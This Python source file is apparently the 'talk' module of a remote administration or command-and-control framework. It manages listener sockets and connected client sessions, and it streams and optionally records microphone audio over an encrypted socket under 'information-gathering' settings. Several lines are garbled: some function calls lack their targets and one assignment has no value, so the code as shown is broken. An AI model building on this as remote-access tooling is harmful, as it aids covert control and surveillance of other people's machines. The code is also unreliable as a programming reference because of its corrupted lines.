import threading import pyaudio import pickle import zlib import sys from domestic.parse.internal_server_error_exception_handling import * from domestic.parse.error_exception_handling import * from domestic.utility.validate_dict_key import * from domestic.session.session_message import * from domestic.utility.status_message import * from domestic.modules.socket_handler import * from domestic.utility.write_error import * from domestic.make.make_wave import * from domestic.global_state import * @internal_server_error_exception_handling def talk_action(): try: headersize = state['settings']['headersize'] encryption = state['settings']['encryption'] encoding = state['settings']['encoding'] username = state['session']['username'] mode = [True, 0, b''] frames = [] p = pyaudio.PyAudio() CHUNK = 81920 FORMAT = pyaudio.paInt16 RATE = 44100 CHANNELS = 2 try: stream =, channels=CHANNELS, rate=RATE, input=True, output=False, frames_per_buffer=CHUNK) except: CHANNELS = 1 stream =, channels=CHANNELS, rate=RATE, input=True, output=False, frames_per_buffer=CHUNK) record = state['options']['information-gathering']['record']['talk'] client, addr = state['sockets']['modules']['talk'][0].accept() client_obj = (client, username, addr) state['sockets']['modules']['talk'][1].append(client_obj) message = pickle.dumps( message = zlib.compress(message, 9) message = encryption.do_encrypt(message) final_msg = bytes(f'{len(message):<{headersize}}', encoding) + message client.send(final_msg) while True: client_msg = client.recv(81920) if mode[0]: mode[1] = int(client_msg[:headersize]) mode[0] = False mode[2] += client_msg if len(mode[2])-headersize == mode[1]: data = frames.append(data) real_msg = pickle.dumps(data) real_msg = zlib.compress(real_msg, 9) real_msg = encryption.do_encrypt(real_msg) final_msg = bytes(f'{len(real_msg):<{headersize}}', encoding) + real_msg client.send(final_msg) mode = [True, 0, b''] except Exception as err: write_error(err) try: if record: make_wave(['modules', 'modules/talk'], client_obj[1], (CHANNELS, p, FORMAT, RATE, frames)) stream.stop_stream() stream.close() p.terminate() state['sockets']['modules']['talk'][1].remove(client_obj) except Exception as err: write_error(err) finally: sys.exit(0) @error_exception_handling def talk(data): ip = validate_dict_key(data, 'ip') port = validate_dict_key(data, 'port') run = validate_dict_key(data, 'run') unbind = validate_dict_key(data, 'unbind') close = validate_dict_key(data, 'close') status = validate_dict_key(data, 'status') if run: assert state['session']['active'] if ip and port: data['ip'], data['port'] = ip, int(port) else: data['ip'], data['port'] = state['sockets']['modules']['talk'][0].getsockname() del data['run'] threading.Thread(target=talk_action, daemon=True).start() session_message(data) elif ip and port: if state['sockets']['modules']['talk'][0] is None: bind_socket(ip, port, 'talk') else: ip, port = state['sockets']['modules']['talk'][0].getsockname() status_message(f'You are already listening for clients (talk module) on {ip}:{port}', 'danger', {'dots': True}) elif unbind: if state['sockets']['modules']['talk'][0]: unbind_socket('talk') else: status_message(f'You\'re not listening for clients (talk module)\nThere is no server socket (talk module) to close', 'warning') elif close: close_client(close, 'talk') elif status: if state['sockets']['modules']['talk'][0]: ip, port = state['sockets']['modules']['talk'][0].getsockname() status_message(f'You are listening for clients (talk module) on {ip}:{port}', 'primary') else: status_message('You are not listening for clients (talk module)', 'warning') else: raise Exception('Error message')